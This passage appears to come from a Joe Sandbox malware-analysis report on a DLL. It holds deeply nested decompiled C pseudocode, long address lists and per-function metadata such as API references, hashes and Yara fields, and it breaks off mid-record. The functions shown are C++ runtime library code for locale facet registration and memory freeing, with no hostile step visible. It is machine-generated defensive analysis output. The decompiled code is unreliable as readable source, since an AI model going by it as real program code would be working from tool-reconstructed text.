																																																				_t835 =  *0x6e2c6dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6E1E161C(0x6e2c6d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6E2066BA(_t858 - 0x14);
																																																					return E6E220075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6E211558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t858 - 0x20);
																																																							E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t606, _t815, _t835, 0x14);
																																																							E6E206653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6e2c6e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6E1E161C(0x6e2c6dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6E2066BA(_t858 - 0x14);
																																																								return E6E220075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6E2115C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t858 - 0x20);
																																																										E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t606, _t816, _t836, 0x14);
																																																										E6E206653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6e2c6dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6E1E161C(0x6e2c6d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6E2066BA(_t858 - 0x14);
																																																											return E6E220075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6E21162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6E1E1438(_t739);
																																																													E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e26851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6e26c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6E21542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6E220075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6E206FD3(__eflags, _t817);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6e2c6dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6E206FD3(__eflags, _t816);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6e2c6e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6E206FD3(__eflags, _t815);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6e2c6dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6E206FD3(__eflags, _t814);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6e2c6dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6E206FD3(__eflags, _t813);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6e2c6de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6E206FD3(__eflags, _t812);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6e2c6ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6E206FD3(__eflags, _t811);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6e2c6db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6E206FD3(__eflags, _t810);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6e2c6dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6E206FD3(__eflags, _t809);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6e2c6dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6E206FD3(__eflags, _t808);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6e2c6dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6E206FD3(__eflags, _t807);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6e2c6df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6E206FD3(__eflags, _t806);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6e2c6df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6E206FD3(__eflags, _t805);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6e2c6dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6E206FD3(__eflags, _t804);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6e2c6df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6E206FD3(__eflags, _t803);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6e2c6dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6E206FD3(__eflags, _t802);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6e2c6dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6E206FD3(__eflags, _t801);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6e2c6db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6E206FD3(__eflags, _t800);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6e2c6de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6E206FD3(__eflags, _t799);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6e2c6dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

0x6e20f0dd
0x6e20f0dd
0x6e20f0e4
0x6e20f0ee
0x6e20f0f3
0x6e20f0fe
0x6e20f102
0x6e20f105
0x6e20f10a
0x6e20f10e
0x6e20f113
0x6e20f117
0x6e20f15c
0x6e20f15f
0x6e20f16b
0x6e20f119
0x6e20f11b
0x6e20f121
0x6e20f127
0x6e20f12f
0x6e20f132
0x6e20f16f
0x6e20f17d
0x6e20f182
0x6e20f18a
0x6e20f194
0x6e20f199
0x6e20f1a4
0x6e20f1a8
0x6e20f1ab
0x6e20f1b0
0x6e20f1b9
0x6e20f1bb
0x6e20f1bd
0x6e20f202
0x6e20f205
0x6e20f211
0x6e20f1bf
0x6e20f1bf
0x6e20f1c1
0x6e20f1c7
0x6e20f1cd
0x6e20f1d5
0x6e20f1d8
0x6e20f215
0x6e20f223
0x6e20f228
0x6e20f230
0x6e20f23a
0x6e20f23f
0x6e20f24a
0x6e20f24e
0x6e20f251
0x6e20f256
0x6e20f25f
0x6e20f261
0x6e20f263
0x6e20f2a8
0x6e20f2ab
0x6e20f2b7
0x6e20f265
0x6e20f265
0x6e20f267
0x6e20f26d
0x6e20f273
0x6e20f27b
0x6e20f27e
0x6e20f2bb
0x6e20f2c9
0x6e20f2ce
0x6e20f2d6
0x6e20f2e0
0x6e20f2e5
0x6e20f2f0
0x6e20f2f4
0x6e20f2f7
0x6e20f2fc
0x6e20f305
0x6e20f307
0x6e20f309
0x6e20f34e
0x6e20f351
0x6e20f35d
0x6e20f30b
0x6e20f30b
0x6e20f30d
0x6e20f313
0x6e20f319
0x6e20f321
0x6e20f324
0x6e20f361
0x6e20f36f
0x6e20f374
0x6e20f37c
0x6e20f386
0x6e20f38b
0x6e20f396
0x6e20f39a
0x6e20f39d
0x6e20f3a2
0x6e20f3ab
0x6e20f3ad
0x6e20f3af
0x6e20f3f4
0x6e20f3f7
0x6e20f403
0x6e20f3b1
0x6e20f3b1
0x6e20f3b3
0x6e20f3b9
0x6e20f3bf
0x6e20f3c7
0x6e20f3ca
0x6e20f407
0x6e20f415
0x6e20f41a
0x6e20f422
0x6e20f42c
0x6e20f431
0x6e20f43c
0x6e20f440
0x6e20f443
0x6e20f448
0x6e20f451
0x6e20f453
0x6e20f455
0x6e20f49a
0x6e20f49d
0x6e20f4a9
0x6e20f457
0x6e20f457
0x6e20f459
0x6e20f45f
0x6e20f465
0x6e20f46d
0x6e20f470
0x6e20f4ad
0x6e20f4bb
0x6e20f4c0
0x6e20f4c8
0x6e20f4d2
0x6e20f4d7
0x6e20f4e2
0x6e20f4e6
0x6e20f4e9
0x6e20f4ee
0x6e20f4f7
0x6e20f4f9
0x6e20f4fb
0x6e20f540
0x6e20f543
0x6e20f54f
0x6e20f4fd
0x6e20f4fd
0x6e20f4ff
0x6e20f505
0x6e20f50b
0x6e20f513
0x6e20f516
0x6e20f553
0x6e20f561
0x6e20f566
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f59d
0x6e20f59f
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5
0x6e20f518
0x6e20f518
0x6e20f51b
0x6e20f51f
0x6e20f523
0x6e20f530
0x6e20f538
0x6e20f53a
0x00000000
0x6e20f53a
0x6e20f501
0x6e20f501
0x00000000
0x6e20f501
0x6e20f4ff
0x6e20f472
0x6e20f472
0x6e20f475
0x6e20f479
0x6e20f47d
0x6e20f48a
0x6e20f492
0x6e20f494
0x00000000
0x6e20f494
0x6e20f45b
0x6e20f45b
0x00000000
0x6e20f45b
0x6e20f459
0x6e20f3cc
0x6e20f3cc
0x6e20f3cf
0x6e20f3d3
0x6e20f3d7
0x6e20f3e4
0x6e20f3ec
0x6e20f3ee
0x00000000
0x6e20f3ee
0x6e20f3b5
0x6e20f3b5
0x00000000
0x6e20f3b5
0x6e20f3b3
0x6e20f326
0x6e20f326
0x6e20f329
0x6e20f32d
0x6e20f331
0x6e20f33e
0x6e20f346
0x6e20f348
0x00000000
0x6e20f348
0x6e20f30f
0x6e20f30f
0x00000000
0x6e20f30f
0x6e20f30d
0x6e20f280
0x6e20f280
0x6e20f283
0x6e20f287
0x6e20f28b
0x6e20f298
0x6e20f2a0
0x6e20f2a2
0x00000000
0x6e20f2a2
0x6e20f269
0x6e20f269
0x00000000
0x6e20f269
0x6e20f267
0x6e20f1da
0x6e20f1da
0x6e20f1dd
0x6e20f1e1
0x6e20f1e5
0x6e20f1f2
0x6e20f1fa
0x6e20f1fc
0x00000000
0x6e20f1fc
0x6e20f1c3
0x6e20f1c3
0x00000000
0x6e20f1c3
0x6e20f1c1
0x6e20f134
0x6e20f134
0x6e20f137
0x6e20f13b
0x6e20f13f
0x6e20f14c
0x6e20f154
0x6e20f156
0x00000000
0x6e20f156
0x6e20f11d
0x6e20f11d
0x00000000
0x6e20f11d
0x6e20f11b

APIs

__EH_prolog3.LIBCMT ref: 6E20F0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F0EE
int.LIBCPMT ref: 6E20F105

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

ctype.LIBCPMT ref: 6E20F128
std::_Facet_Register.LIBCPMT ref: 6E20F13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F17D

Strings

(k,n, xrefs: 6E20F0F9

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (k,n
API String ID: 1394824916-2474335229
Opcode ID: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
Instruction ID: 0c45d773f348144a53aee096c385ca3720259a60b4694af22e905baab13ee6b9
Opcode Fuzzy Hash: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
Instruction Fuzzy Hash: 7011C67591052DDBCF01EBE4C894AEEB7BBAF45B15F240908E510AB3D0DB749A44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

_memcmp.LIBVCRUNTIME ref: 6E24EC2E
_free.LIBCMT ref: 6E24EC9F
_free.LIBCMT ref: 6E24ECB8
_free.LIBCMT ref: 6E24ECEA
_free.LIBCMT ref: 6E24ECF3
_free.LIBCMT ref: 6E24ECFF

Strings

C, xrefs: 6E24EAEC

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: ff9648f88c3eddef5ab944fc4299193c0d266fe33496c0287bae4c0be631331f
Instruction ID: b1b15a0b1200166e04248ea529bcf5a4c7a177af09dd3a0eb513ee286b4b1cfc
Opcode Fuzzy Hash: ff9648f88c3eddef5ab944fc4299193c0d266fe33496c0287bae4c0be631331f
Instruction Fuzzy Hash: 56C15D7590121EDFEB68DF58C888A9DB7B6FF49704F1045AAD94AAB350D731AE80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20FC90
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FC9A
int.LIBCPMT ref: 6E20FCB1

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FD29

Strings

`m,n, xrefs: 6E20FCA5

Memory Dump Source

